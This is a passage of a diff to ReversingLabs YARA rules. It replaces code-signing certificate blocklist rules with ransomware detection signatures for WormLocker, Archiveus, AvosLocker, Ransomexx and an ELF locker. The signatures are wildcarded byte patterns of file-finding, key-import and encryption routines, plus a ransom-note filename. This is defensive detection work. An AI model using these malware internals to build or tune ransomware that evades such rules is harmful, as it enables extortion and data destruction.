+            ?? 44 89 00 E9 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 83 CA ?? E9
+        }
+		$init_key_v2 = {
+            48 85 FF 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41 56 41 55 41 54 55 48 89 F5
+            53 48 89 FB 48 81 EC ?? ?? ?? ?? 4C 8D 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ??
+            66 0F EF C0 48 8D 35 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 49 89 E6 0F 29 04 24 0F 29 44
+            24 ?? E8 ?? ?? ?? ?? 49 89 C5 48 85 C0 74 ?? 4C 89 F7 48 89 C1 BA ?? ?? ?? ?? BE ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 F6 4C 89 E7 E8
+            ?? ?? ?? ?? 85 C0 74 ?? 31 C0 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3 66 2E
+            0F 1F 84 00 ?? ?? 00 00 31 C0 C3 0F 1F 44 00 ?? 48 89 EA 48 89 DE 4C 89 E7 E8 ?? ??
+            ?? ?? 85 C0 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 89 E8 EB
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE8\\x80\\x98\\xE5\\x8D\\x87\\xE5\\xA4\\xA9\\xE4\\xB8\\x8B\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "1b:e4:1b:34:12:7c:a9:e6:27:08:30:d2:07:0d:b4:26" and 1352764799 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $find_files_v1_p* ) ) and ( all of ( $kill_processes_v1_p* ) ) and ( $init_key_v1 ) and ( all of ( $encrypt_files_v1_p* ) ) and ( $shut_down_esxi_v1 ) ) or ( ( all of ( $find_files_v2_p* ) ) and ( all of ( $kill_processes_v2_p* ) ) and ( $init_key_v2 ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_9B108B8A1Daa0D5581F59Fcee0447901 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wormlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WormLocker ransomware."
 		author = "ReversingLabs"
-		id = "cacb2af8-dbc6-5d61-a2d5-641c5c09bc79"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "6d7b55b7-2e1b-56e0-950f-07a2d3fa17ae"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2486-L2504"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.WormLocker.yara#L1-L69"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "696e3da511f74f9cfb10b96130a36ae9f48c22f1e0deb76092db1262980ab3ac"
+		logic_hash = "87a4f805de78d7e7dffb176302407453108ca01552c682aeee38f8d0201263c9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WormLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$set_environment = {
+            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 20 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 13 ?? 11 ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+            11 ?? 17 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2A
+        }
+		$find_files = {
+            00 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 0C 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ??
+            ?? 0D 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 73 ?? ??
+            ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 00 11 ?? 09 11 ?? 9A 11 ?? 6F ?? ?? ??
+            ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 FE 04 13 ?? 11 ?? 2D ?? 16 13 ?? 2B ?? 00 11
+            ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04
+            13 ?? 11 ?? 2D ?? 2A
+        }
+		$encrypt_files_p1 = {
+            00 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73
+            ?? ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            00 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            00 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16
+            02 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ??
+            ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08
+            2C ?? 08 6F ?? ?? ?? ?? 00 DC 06 13 ?? 2B ?? 11 ?? 2A
+        }
+		$encrypt_files_p2 = {
+            00 03 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ??
+            ?? ?? 0B 06 07 28 ?? ?? ?? ?? 0C 03 0D 09 08 28 ?? ?? ?? ?? 00 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CharacTell Ltd" and ( pe.signatures [ i ] . serial == "00:9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01" or pe.signatures [ i ] . serial == "9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01" ) and 1380671999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $set_environment ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5F8203C430Fc7Db4E61F6684F6829Ffc : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Archiveus : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Archiveus ransomware."
 		author = "ReversingLabs"
-		id = "975cd500-2f08-55c9-a821-4dde3a54ae0c"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "89e5af93-1153-5367-a539-6af77c99c214"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2506-L2522"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Archiveus.yara#L3-L50"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cd22d1beea12d1f6c50f69e76074c2582ce5567887056c43d4d6c87d33fce1bf"
+		logic_hash = "2b8a42b98ab3e8b97d2e226e979f342a6a72f21d8f068f59c21ad95764077f8a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Archiveus"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$entry_point = {
+            68 ?? ?? 40 00 E8 ?? ?? ?? FF
+        }
+		$dump_instruction = {
+            8B 3D ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ??
+            50 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D7 FF 15 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 1D ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 50 51 FF D3 50 8D 55 ?? 8D
+            45 ?? 52 50 FF D3 50 FF 15
+        }
+		$extension_rule = {
+            8B 13 6A ?? 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? D9 85 ?? ?? ?? ?? DB 85 ?? ?? ??
+            ?? DD 9D ?? ?? ?? ?? DC 8D ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? DC 05 ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 89 45
+            ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF
+            15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ??
+            50 6A ?? 6A ?? 6A ?? FF 15
+        }
+		$instruction_string = "INSTRUCTIONS HOW TO GET YOUR FILES BACK.txt" wide
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haivision Network Video" and pe.signatures [ i ] . serial == "5f:82:03:c4:30:fc:7d:b4:e6:1f:66:84:f6:82:9f:fc" and 1382572799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $entry_point at pe.entry_point ) and $dump_instruction and $extension_rule and $instruction_string
 }
-
-rule REVERSINGLABS_Cert_Blocklist_6B6Daef5Be29F20Ddce4B0F5E9Fa6Ea5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Avoslocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AvosLocker ransomware."
 		author = "ReversingLabs"
-		id = "55611c9a-d45d-55fa-8e5e-a5621223cc9d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "a803283d-6424-5a64-89e6-c73a3322ba1e"
+		date = "2021-10-22"
+		modified = "2021-10-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2524-L2540"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.AvosLocker.yara#L1-L108"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "edd2f302d2fac65f6a93372a24c3f80757f2b175af661032917366e9629c5491"
+		logic_hash = "4d81b801a95a54a35989c4a985d92578971568d1412f625bca911d0fa1eee1fe"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "AvosLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF
+            B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89
+            9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9
+            ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
+            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ??
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15
+        }
+		$enum_resources = {
+            50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 57
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 33 DB 39 5D ?? 76 ?? 8D 77 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7E
+            ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 39 46 ?? B9 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 8B D1 0F 45 56 ?? 8B C1 83
+            7E ?? ?? 0F 11 85 ?? ?? ?? ?? 0F 45 46 ?? 83 3E ?? 0F 28 05 ?? ?? ?? ?? 89 45 ?? 8B
+            C1 0F 45 06 83 7E ?? ?? 0F 11 45 ?? 89 45 ?? 8B C1 0F 28 05 ?? ?? ?? ?? 0F 45 46 ??
+            33 C9 0F 11 45 ?? 89 45 ?? 0F 28 05 ?? ?? ?? ?? 0F 11 45 ?? 8A 85 ?? ?? ?? ?? 30 84
+            0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 52 FF 75 ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? FF 75 ??
+            FF 75 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3E ?? 0F 84 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ??
+            59 83 F8 ?? 0F 86 ?? ?? ?? ?? 8B 06 80 78 ?? ?? 75 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 33 C0 66 C7 45 ?? ?? ?? C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ??
+            8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 FF 36 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 65 ?? ?? 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ??
+            C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 83 4D ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? EB ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ??
+            C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8
+            ?? ?? ?? ?? 59 F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5D
+            ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15
+        }
+		$import_key = {
+            50 53 53 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? FF D6 50 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B1 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 30 8C 05 ?? ??
+            ?? ?? 40 83 F8 ?? 73 ?? 8A 8D ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 59 0F 11 85 ?? ?? ?? ??
+            59 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 88 9D
+            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 88 9D ?? ?? ??
+            ?? FF D6 50 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 36 8D 45 ?? 89 9D ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? FF 76 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 83 C4 ?? 8B D7 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            84 C0 75 ?? 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7
+            85 ?? ?? ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83
+            F9 ?? 72 ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 50 E8
+            ?? ?? ?? ?? 59 8D 4D ?? 85 C0 74 ?? 88 19 41 83 E8 ?? 75 ?? 39 9D ?? ?? ?? ?? 74 ??
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8
+        }
+		$encrypt_files = {
+            50 51 51 FF B5 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B BD ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 0F 84 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CE 85 C0 74 ?? C6 01 ?? 41 83 E8 ?? 75 ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 59 83 C0 ?? 74 ?? 39 85 ?? ?? ?? ?? 72 ?? 50 8D 85 ?? ?? ??
+            ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83
+            C4 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 59 57 40 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 6A ?? FF B5 ?? ?? ?? ?? 6A
+            ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? D1 EF 6A ?? 5A 74 ??
+            8B 9D ?? ?? ?? ?? 4B 03 DE 8A 03 8A 0C 32 88 04 32 42 88 0B 4B 3B D7 72 ?? 8B 9D ??
+            ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 03 C3 56 50 E8 ?? ?? ?? ?? 03 DF 56
+            89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ??
+            ?? 47 81 C6 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2
+            B9 ?? ?? ?? ?? F7 F1 83 C4 ?? 40 3B F8 0F 82
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Calibration Consultants" and pe.signatures [ i ] . serial == "6b:6d:ae:f5:be:29:f2:0d:dc:e4:b0:f5:e9:fa:6e:a5" and 1280447999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_57D6Dff1Ef96F01B9430666B2733Cc87 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ransomexx : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ransomexx ransomware."
 		author = "ReversingLabs"
-		id = "c20b81a1-7331-57a9-9daf-007ec516a473"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "5e62660d-2696-56c7-9322-fed6ce9d36ff"
+		date = "2020-11-26"
+		modified = "2020-11-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2542-L2558"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ransomexx.yara#L1-L147"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "40d22137e9c5345859c5f000166da2a3117bcfcc19b4c5e81083cad80dfa6ee4"
+		logic_hash = "27b4132b7f16cafc40687e96a552ce59cc24ebf7679575680f170e3beee8a0a9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ransomexx"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Plugin Ltda" and pe.signatures [ i ] . serial == "57:d6:df:f1:ef:96:f0:1b:94:30:66:6b:27:33:cc:87" and 1314575999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0166B65038D61E5435B48204Cae4795A : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "04bdefc5-ee4e-5a46-94d6-e3a5d8b56ce0"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2560-L2576"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4e289eda4d5381250bcd6e36daade6f1e1803b6d16578d7eaee4454cef6981d0"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B F4 B3 ?? 85 F6 74 ?? C6 46 ?? ?? B0 ?? 66 C7 06 ?? ?? 88 5E ?? 88
+            46 ?? 8B C7 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8B C6 8D 78 ?? 8A 08 40 84
+            C9 75 ?? 2B C7 8D 84 10 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ??
+            ?? 8B F0 89 75 ?? 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E 5B 8B E5
+            5D C3 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 89 45 ?? 85 C0 74 ?? C6 40 ?? ?? 88 18 88
